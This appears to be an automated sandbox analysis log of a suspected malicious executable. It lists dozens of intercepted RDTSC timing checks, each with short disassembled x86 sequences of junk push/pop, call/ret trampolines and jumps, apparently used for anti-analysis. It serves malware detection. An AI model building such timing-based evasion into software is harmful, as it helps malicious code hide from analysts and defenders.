                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AAE22E second address: AAE2A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov dword ptr [esp], eax 0x00000008 mov dword ptr [ebp+122D3241h], eax 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push ecx 0x00000013 call 00007F5D20C24758h 0x00000018 pop ecx 0x00000019 mov dword ptr [esp+04h], ecx 0x0000001d add dword ptr [esp+04h], 0000001Bh 0x00000025 inc ecx 0x00000026 push ecx 0x00000027 ret 0x00000028 pop ecx 0x00000029 ret 0x0000002a movzx esi, si 0x0000002d or si, 7300h 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push edi 0x00000037 call 00007F5D20C24758h 0x0000003c pop edi 0x0000003d mov dword ptr [esp+04h], edi 0x00000041 add dword ptr [esp+04h], 0000001Ch 0x00000049 inc edi 0x0000004a push edi 0x0000004b ret 0x0000004c pop edi 0x0000004d ret 0x0000004e mov dword ptr [ebp+122D2106h], ebx 0x00000054 push eax 0x00000055 push eax 0x00000056 push edx 0x00000057 jl 00007F5D20C24758h 0x0000005d pushad 0x0000005e popad 0x0000005f rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AAED91 second address: AAEDB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 jnc 00007F5D20D3D68Ch 0x0000000d popad 0x0000000e push eax 0x0000000f jl 00007F5D20D3D694h 0x00000015 push eax 0x00000016 push edx 0x00000017 push esi 0x00000018 pop esi 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AAEDB0 second address: AAEDB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AAEB93 second address: AAEB99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AAEB99 second address: AAEB9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AAF8BC second address: AAF8C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AAF8C1 second address: AAF8C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AAF8C7 second address: AAF8CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AAF8CB second address: AAF950 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007F5D20C24758h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 00000015h 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 add dword ptr [ebp+122D1BA4h], esi 0x0000002b push 00000000h 0x0000002d mov esi, dword ptr [ebp+122D2C55h] 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push esi 0x00000038 call 00007F5D20C24758h 0x0000003d pop esi 0x0000003e mov dword ptr [esp+04h], esi 0x00000042 add dword ptr [esp+04h], 00000015h 0x0000004a inc esi 0x0000004b push esi 0x0000004c ret 0x0000004d pop esi 0x0000004e ret 0x0000004f jmp 00007F5D20C24766h 0x00000054 push eax 0x00000055 jnp 00007F5D20C2477Fh 0x0000005b push eax 0x0000005c push edx 0x0000005d jmp 00007F5D20C24761h 0x00000062 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AAF5E1 second address: AAF5F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jl 00007F5D20D3D68Ch 0x0000000f js 00007F5D20D3D686h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AB3C3C second address: AB3C40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AB59E6 second address: AB5A50 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F5D20D3D688h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007F5D20D3D688h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 0000001Ah 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 call 00007F5D20D3D68Eh 0x0000002c and edi, dword ptr [ebp+122D320Ch] 0x00000032 pop ebx 0x00000033 push 00000000h 0x00000035 mov dword ptr [ebp+124548A2h], esi 0x0000003b push 00000000h 0x0000003d movsx edi, bx 0x00000040 push eax 0x00000041 pushad 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007F5D20D3D695h 0x00000049 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AB5A50 second address: AB5A5A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AB5A5A second address: AB5A5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AB7AFF second address: AB7B19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D20C24760h 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007F5D20C24756h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AB5C7A second address: AB5C83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AB5C83 second address: AB5C87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A666E7 second address: A66704 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5D20D3D697h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A66704 second address: A66715 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pushad 0x0000000b popad 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A66715 second address: A66719 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A66719 second address: A6673E instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5D20C24756h 0x00000008 jng 00007F5D20C24756h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jg 00007F5D20C24756h 0x00000018 jmp 00007F5D20C2475Dh 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A6673E second address: A66742 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AB8EED second address: AB8F70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jnp 00007F5D20C2475Ch 0x0000000b popad 0x0000000c push eax 0x0000000d push ecx 0x0000000e push ecx 0x0000000f jmp 00007F5D20C2475Bh 0x00000014 pop ecx 0x00000015 pop ecx 0x00000016 nop 0x00000017 push 00000000h 0x00000019 push ebx 0x0000001a call 00007F5D20C24758h 0x0000001f pop ebx 0x00000020 mov dword ptr [esp+04h], ebx 0x00000024 add dword ptr [esp+04h], 00000014h 0x0000002c inc ebx 0x0000002d push ebx 0x0000002e ret 0x0000002f pop ebx 0x00000030 ret 0x00000031 push 00000000h 0x00000033 jnl 00007F5D20C2475Ch 0x00000039 push 00000000h 0x0000003b push 00000000h 0x0000003d push edx 0x0000003e call 00007F5D20C24758h 0x00000043 pop edx 0x00000044 mov dword ptr [esp+04h], edx 0x00000048 add dword ptr [esp+04h], 00000019h 0x00000050 inc edx 0x00000051 push edx 0x00000052 ret 0x00000053 pop edx 0x00000054 ret 0x00000055 jmp 00007F5D20C2475Dh 0x0000005a push eax 0x0000005b push ebx 0x0000005c push eax 0x0000005d push edx 0x0000005e push eax 0x0000005f pop eax 0x00000060 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AB8232 second address: AB8236 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AB9F30 second address: AB9F45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5D20C24760h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AB90C4 second address: AB90CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: ABAEDA second address: ABAEE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007F5D20C24756h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: ABAEE7 second address: ABAF3C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F5D20D3D68Ch 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007F5D20D3D688h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 00000017h 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 sbb ebx, 591A26EEh 0x0000002e push 00000000h 0x00000030 push edx 0x00000031 mov bl, ah 0x00000033 pop ebx 0x00000034 sub dword ptr [ebp+122D1935h], eax 0x0000003a push 00000000h 0x0000003c or edi, dword ptr [ebp+122D337Eh] 0x00000042 xchg eax, esi 0x00000043 pushad 0x00000044 pushad 0x00000045 push ecx 0x00000046 pop ecx 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: ABAF3C second address: ABAF49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007F5D20C2475Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: ABAF49 second address: ABAF5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jbe 00007F5D20D3D690h 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: ABA0A7 second address: ABA135 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F5D20C2475Ch 0x0000000c popad 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007F5D20C24758h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 mov dword ptr [ebp+122D3769h], esi 0x0000002e push dword ptr fs:[00000000h] 0x00000035 sub ebx, dword ptr [ebp+122D2AD1h] 0x0000003b mov dword ptr fs:[00000000h], esp 0x00000042 push 00000000h 0x00000044 push ebx 0x00000045 call 00007F5D20C24758h 0x0000004a pop ebx 0x0000004b mov dword ptr [esp+04h], ebx 0x0000004f add dword ptr [esp+04h], 00000018h 0x00000057 inc ebx 0x00000058 push ebx 0x00000059 ret 0x0000005a pop ebx 0x0000005b ret 0x0000005c mov bx, ax 0x0000005f mov edi, dword ptr [ebp+122D1943h] 0x00000065 mov eax, dword ptr [ebp+122D041Dh] 0x0000006b mov bh, 86h 0x0000006d push FFFFFFFFh 0x0000006f nop 0x00000070 push eax 0x00000071 push edx 0x00000072 pushad 0x00000073 push esi 0x00000074 pop esi 0x00000075 push eax 0x00000076 pop eax 0x00000077 popad 0x00000078 rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: ABBE71 second address: ABBE75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: ABBE75 second address: ABBE7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: ABBE7B second address: ABBE8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5D20D3D68Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: ABB17A second address: ABB180 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: ABDD15 second address: ABDD1A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: ABDD1A second address: ABDDA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007F5D20C24758h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 0000001Ah 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 mov dword ptr [ebp+122D21D5h], esi 0x0000002a push 00000000h 0x0000002c mov bx, F4E5h 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push esi 0x00000035 call 00007F5D20C24758h 0x0000003a pop esi 0x0000003b mov dword ptr [esp+04h], esi 0x0000003f add dword ptr [esp+04h], 0000001Dh 0x00000047 inc esi 0x00000048 push esi 0x00000049 ret 0x0000004a pop esi 0x0000004b ret 0x0000004c jmp 00007F5D20C24763h 0x00000051 push eax 0x00000052 pushad 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007F5D20C24765h 0x0000005a rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: ABDDA5 second address: ABDDA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: ABCF2F second address: ABCF33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: ABCF33 second address: ABCFC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp], eax 0x0000000a clc 0x0000000b push dword ptr fs:[00000000h] 0x00000012 push 00000000h 0x00000014 push edx 0x00000015 call 00007F5D20D3D688h 0x0000001a pop edx 0x0000001b mov dword ptr [esp+04h], edx 0x0000001f add dword ptr [esp+04h], 00000018h 0x00000027 inc edx 0x00000028 push edx 0x00000029 ret 0x0000002a pop edx 0x0000002b ret 0x0000002c or dword ptr [ebp+1247653Ch], edi 0x00000032 mov dword ptr fs:[00000000h], esp 0x00000039 push 00000000h 0x0000003b push ebx 0x0000003c call 00007F5D20D3D688h 0x00000041 pop ebx 0x00000042 mov dword ptr [esp+04h], ebx 0x00000046 add dword ptr [esp+04h], 0000001Bh 0x0000004e inc ebx 0x0000004f push ebx 0x00000050 ret 0x00000051 pop ebx 0x00000052 ret 0x00000053 mov eax, dword ptr [ebp+122D175Dh] 0x00000059 push edx 0x0000005a mov dword ptr [ebp+12456339h], eax 0x00000060 pop edi 0x00000061 push FFFFFFFFh 0x00000063 mov ebx, 4626FD17h 0x00000068 nop 0x00000069 push eax 0x0000006a push edx 0x0000006b jmp 00007F5D20D3D696h 0x00000070 rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: ABCFC3 second address: ABCFC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: ABCFC9 second address: ABCFCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: ABCFCD second address: ABCFEF instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5D20C24756h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F5D20C24762h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: ABED90 second address: ABED95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: ABED95 second address: ABEDA0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F5D20C24756h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: ABEDA0 second address: ABEE04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007F5D20D3D688h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 and di, A5E4h 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push ebx 0x0000002e call 00007F5D20D3D688h 0x00000033 pop ebx 0x00000034 mov dword ptr [esp+04h], ebx 0x00000038 add dword ptr [esp+04h], 00000019h 0x00000040 inc ebx 0x00000041 push ebx 0x00000042 ret 0x00000043 pop ebx 0x00000044 ret 0x00000045 push 00000000h 0x00000047 xor dword ptr [ebp+122D18F3h], eax 0x0000004d push eax 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 popad 0x00000054 rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: ABEE04 second address: ABEE08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: ABDF3D second address: ABDF43 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: ABEE08 second address: ABEE0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: AC0136 second address: AC013A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: AC1D06 second address: AC1D10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F5D20C24756h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: AC1D10 second address: AC1D14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: AC0E92 second address: AC0E9C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: AC0E9C second address: AC0EA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: AC0EA0 second address: AC0EC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D20C24769h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007F5D20C24756h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: AC0F6C second address: AC0F78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: AC0F78 second address: AC0F7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: AC0F7C second address: AC0F80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: AC1E8F second address: AC1E99 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F5D20C24756h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: AC1E99 second address: AC1E9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: AC1E9F second address: AC1EA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: AC1EA3 second address: AC1F09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 jmp 00007F5D20D3D699h 0x00000015 popad 0x00000016 nop 0x00000017 jmp 00007F5D20D3D68Ah 0x0000001c push dword ptr fs:[00000000h] 0x00000023 movsx ebx, ax 0x00000026 mov dword ptr fs:[00000000h], esp 0x0000002d push ebx 0x0000002e cmc 0x0000002f pop ebx 0x00000030 mov eax, dword ptr [ebp+122D0CF1h] 0x00000036 mov dword ptr [ebp+122D33E3h], edx 0x0000003c cmc 0x0000003d push FFFFFFFFh 0x0000003f push eax 0x00000040 pushad 0x00000041 js 00007F5D20D3D688h 0x00000047 push ebx 0x00000048 pop ebx 0x00000049 push eax 0x0000004a push edx 0x0000004b push ebx 0x0000004c pop ebx 0x0000004d rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: AC1F09 second address: AC1F0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: AC5EBA second address: AC5ECB instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5D20D3D688h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: AC5ECB second address: AC5EF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F5D20C24756h 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F5D20C24761h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F5D20C2475Ah 0x00000019 rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: AC5EF5 second address: AC5EFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: AC5EFD second address: AC5F02 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: AC5F02 second address: AC5F10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ecx 0x00000006 jl 00007F5D20D3D686h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: ACDEBD second address: ACDECE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D20C2475Ch 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wf1Ps82LYF.exe RDTSC instruction interceptor: First address: ACD761 second address: ACD775 instructions: 0x00000000 rdtsc 0x00000002 je 00007F5D20D3D686h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007F5D20D3D686h 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
